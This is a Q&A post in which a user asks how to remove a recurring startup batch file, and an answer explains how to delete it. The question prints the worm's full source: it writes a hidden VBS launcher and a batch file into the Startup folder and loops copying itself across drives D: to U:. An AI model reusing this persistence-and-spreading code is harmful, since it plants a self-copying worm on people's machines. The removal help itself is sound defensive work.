# non deletable and non editable batch file

Tags: batch-file

i found a batch in my pc drive which executes on every startup and shows some message .the problem is i am not able to delete this file and the code is not editable(someone might created in that way).whenever i delete this batch file it appears again . what should i do then ??
the code is -

```
@echo off

(echo @echo off

echo color 1a

echo title @VIRUS = HR

echo echo danger!!

echo pause)>"%appdata%\Microsoft\windows\start menu\Programs\Startup\system.bat"

(echo @echo off

echo :A

echo copy /y %appdata%\movie.bat d:

echo copy /y %appdata%\movie.bat e:

echo copy /y %appdata%\movie.bat f:

echo copy /y %appdata%\movie.bat g:

echo copy /y %appdata%\movie.bat h:

echo copy /y %appdata%\movie.bat i:

echo copy /y %appdata%\movie.bat j:

echo copy /y %appdata%\movie.bat k:

echo copyta%\ /y %appdata%\movie.bat l:

echo copy /y %appdata%\movie.bat m:

echo copy /y %appdata%\movie.bat n:

echo copy /y %appdata%\movie.bat o:

echo copy /y %appdata%\movie.bat p:

echo copy /y %appdata%\movie.bat q:

echo copy /y %appdata%\movie.bat r:

echo copy /y %appdata%\movie.bat s:

echo copy /y %appdata%\movie.bat t:

echo copy /y %appdata%\movie.bat u:

echo goto A)>"%appdata%\vol.bat"

(echo Set WshShell = CreateObject^("WScript.Shell"^)

echo WshShell.Run chr^(34^) ^& "%appdata%\vol.bat" ^& Chr^(34^), 0

echo Set WshShell = Nothing) > "%appdata%\Microsoft\windows\start 

menu\Programs\startup\windows.vbs"

copy movie.bat %appdata%
```

Comment: 1) Off topic here. Try [SU]. 2) Looks like you have a virus or similar. Install anti-virus software.

Answer (score 0):

This is a self replicating batchfile.

Delete two files from your autostart folder to prevent it from running again:

```
del "%appdata%\Microsoft\windows\start menu\Programs\Startup\system.bat"
del "%appdata%\Microsoft\windows\start menu\Programs\startup\windows.vbs"
```

Then reboot to stop running instance.

After that, remove any occurence of "movie.bat" from all your drives and

```
del "%appdata%\vol.bat"
```

The good message is, it didn't harm your system. Just take it's message: "don't run any suspect code and choose wisely whom you trust"